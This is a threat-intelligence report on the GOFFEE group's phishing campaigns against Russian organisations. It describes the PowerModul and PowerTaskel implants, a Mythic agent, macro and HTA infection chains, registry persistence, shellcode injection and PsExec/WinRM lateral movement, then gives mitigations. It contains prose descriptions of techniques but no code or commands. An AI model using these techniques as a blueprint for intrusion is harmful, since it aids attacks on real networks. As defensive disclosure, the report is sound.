GOFFEE Threat Actor Targeting Russian Organizations

Summary

Kaspersky identified an activity the GOFFEEThreat Actor conducted in the latter half of 2024, targeting Russian organizations. The activity employed PowerTaskel a private Mythic agent developed in PowerShell and introduced a new implant - PowerModul. The group focused its attacks on critical sectors, including media and telecommunications, construction, government, and energy.

GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed it conducting malicious activity exclusively targeting entities within the Russian Federation through spear phishing emails containing malicious attachments.

Between May 2022 and the summer of 2023, GOFFEE consistently deployed a modified version of Owowa a malicious IIS module in its operations. Starting in 2024, the group shifted tactics, delivering patched, malicious instances of explorer.exe via spear phishing campaigns.

Technical Analysis

GOFFEE employs multiple infection schemes that all begin with a phishing email that, in turn, contains a malicious attachment. While the entry point remains consistent, the techniques diverge after the initial delivery. Two primary infection chains were observed. In the first scheme, the attachment is a RAR archive containing an executable disguised as a document, often using a double extension such as “.pdf.exe” or “.doc.exe” to deceive the user. When executed, this file displays a decoy document fetched from the Command and Control (C&C) server to distract the victim while the actual malicious activity proceeds in the background. The executable itself is a legitimate Windows system file (e.g., explorer.exe or xpsrchvw.exe) that has been patched to include a malicious shellcode. This shellcode contains an obfuscated version of a Mythic agent, which initiates communication with the C&C server shortly after execution.

The second infection vector also leverages a RAR archive, but this time, it contains a Microsoft Office document with a malicious macro. Upon opening, the document displays scrambled text along with a prompt urging the user to click “Enable Content,” under the guise that the file was created in Microsoft Word – albeit an older version. When enabled, the macro not only decodes the scrambled text and hides the warning image but also drops two files a .hta file and a PowerShell script into the user’s current directory. The macro then modifies the Windows registry, setting the “LOAD” key to the .hta file, ensuring it is automatically executed for the current user.

The .hta file doesn't directly launch the PowerShell implant (PowerModul). Instead, it uses cmd.exe to generate a JavaScript file named UserCacheHelper.lnk.js, which in turn launches the UserCache.ini PowerShell file containing the encoded PowerModul payload. Notably, the malicious files contain hardcoded paths tied to the user’s specific environment, making each infection instance unique in terms of file names and sizes.

PowerModul

PowerModul is a PowerShell-based implant first observed in early 2024. Initially seen as a simple loader for the PowerTaskel backdoor, it has since been identified as a standalone malware family due to its distinct communication protocol, unique payload structure, and separate C&C infrastructure.

In the infection chain, PowerModul is embedded within the UserCache.ini file as a Base64-encoded string. Once decoded and executed, the script not only initiates communication with the C&C server but also replicates part of the functionality found in the initial dropper macro—such as creating and hiding malicious files and modifying registry keys. Upon execution, PowerModul collects system identifiers (computer name, username, and disk serial number) and appends them to the C&C URL, which responds with Base64-encoded PowerShell modules in an XML format. These modules are then decoded and executed on the victim machine.

A notable feature of PowerModul is a function called OfflineWorker(), designed to execute hardcoded Base64 payloads even without active C&C communication. While sometimes the offline payload string is empty, in other observed cases, it has been used to deliver additional tools like FlashFileGrabber, a data theft utility.

Overall, PowerModul is a flexible and modular implant used to maintain persistence, download additional payloads, and enable both online and offline operations. It has been used to deploy various second-stage tools, including PowerTaskel, FlashFileGrabber, and USB Worms, indicating its central role in GOFFEE’s evolving toolset.

Lateral Movement

The lateral movement activity associated with PowerTaskel demonstrates a highly structured and layered approach to privilege escalation and remote execution. Upon successful compromise, PowerTaskel attempts to elevate its privileges to the SYSTEM level using PsExec, a legitimate administrative tool from the Sysinternals suite. This utility, often renamed as ntuser.exe or 1cv9.exe, is dropped into the same directory as PowerTaskel and used to execute mshta.exe with SYSTEMlevel privileges. The command-line execution includes a URL pointing to a malicious HTA file, which is subsequently downloaded and executed.

The HTA file is central to a scripted chain of commands that leads to the re-execution of PowerTaskel with elevated privileges. It uses simple console commands like echo to create JavaScript and text files on disk, which are then executed in sequence. One script writes and runs another, ultimately resulting in a PowerShell script being executed. This script acts as a loader, retrieving the main PowerTaskel payload from a hardcoded location and launching it under the SYSTEM account.

Once PowerTaskel is fully operational with elevated privileges, it communicates with its commandand-control server to retrieve and execute additional tasks. One notable capability is its use of csc.exe, the C# command-line compiler, to compile and execute shellcode loaders in real-time. These loaders are often tied to an auxiliary DLL that allocates memory and injects a more advanced payload—specifically, the Mythic agent. This agent offers extensive post-exploitation functionality and is capable of further expanding attacker control across the network.

For lateral movement, the Mythic agent leverages Windows Remote Management (WinRM) to access other systems on the network. This involves making HTTP requests to WinRM endpoints on remote machines, using a unique User-Agent string, “Ruby WinRM Client,” indicating automation via Ruby-based scripts. Once access is established, the agent executes additional HTA payloads on remote systems, typically using mshta.exe, often wrapped in various scripting contexts such as PowerShell or CMD commands. These remote executions follow similar patterns to the initial infection, allowing the attacker to propagate laterally while maintaining stealth.

Recent activity suggests that GOFFEE, the threat actor behind this campaign, is increasingly shifting from using PowerTaskel to relying more on the Mythic agent for lateral movement. This change likely reflects the more advanced capabilities and modularity offered by the Mythic framework, which enables greater control, automation, and adaptability in complex network environments.

Mythic agent HTA

The Mythic agent deployed in this campaign is delivered through a highly obfuscated and multilayered execution chain that leverages a polyglot payload format. This payload is initiated via mshta.exe with a URL pointing to a large, 180-kilobyte file that appears as an HTA file but contains multiple embedded components. The beginning of the file holds shellcode for the Mythic agent, followed by two Base64-encoded PowerShell scripts and ending with an HTA section containing obfuscated JScript.

When executed, the HTA script identifies its launch method and locates the cached file in the system’s InetCache directory. It then creates two new files settings.js and settings.ps1 and executes them with specific arguments before deleting them shortly after. These scripts work together to extract, decode, and execute the embedded PowerShell code. The process involves reading the Base64 scripts, compiling a helper DLL, allocating memory, and finally injecting the Mythic shellcode into memory. Once active, the Mythic agent provides the attacker with advanced post-exploitation capabilities, allowing for in-memory execution and stealthy command-andcontrol communication, facilitating persistent and covert access to the compromised system.

In this campaign, the attacker utilized PowerTaskel, a tool previously associated with the GOFFEE group. The infection chain also involved the use of HTA files and multiple scripts. The malicious executable attached to the spear-phishing email is a patched version of explorer.exe, resembling samples seen in earlier GOFFEE attacks in 2024. It contains shellcode that closely matches previously identified GOFFEE payloads. Given the similarities in tools, techniques, and victim targeting, this campaign can be attributed to the GOFFEE group with a high degree of confidence.

Recommendations

• The initial compromise typically originates through spam emails. Implement robust email filtering solutions to detect and block malicious attachments before they reach end users.

• Be vigilant with email attachments and embedded links, especially from unfamiliar sources. Always verify the sender’s legitimacy if an email appears suspicious or unexpected.

• Limit the use of scripting tools such as PowerShell and mshta.exe on workstations and servers where they are not essential, reducing the attack surface and mitigating script-based threats.

• Enforce application whitelisting to allow execution of only trusted and approved applications and DLLs across the environment.

• Monitor AMP (Advanced Malware Protection) links using robust URL filtering solutions and threat intelligence to identify and block suspicious behavior.

• Deploy network-level monitoring to detect anomalies or potential data exfiltration by malware, and proactively block any suspicious activity to prevent compromise.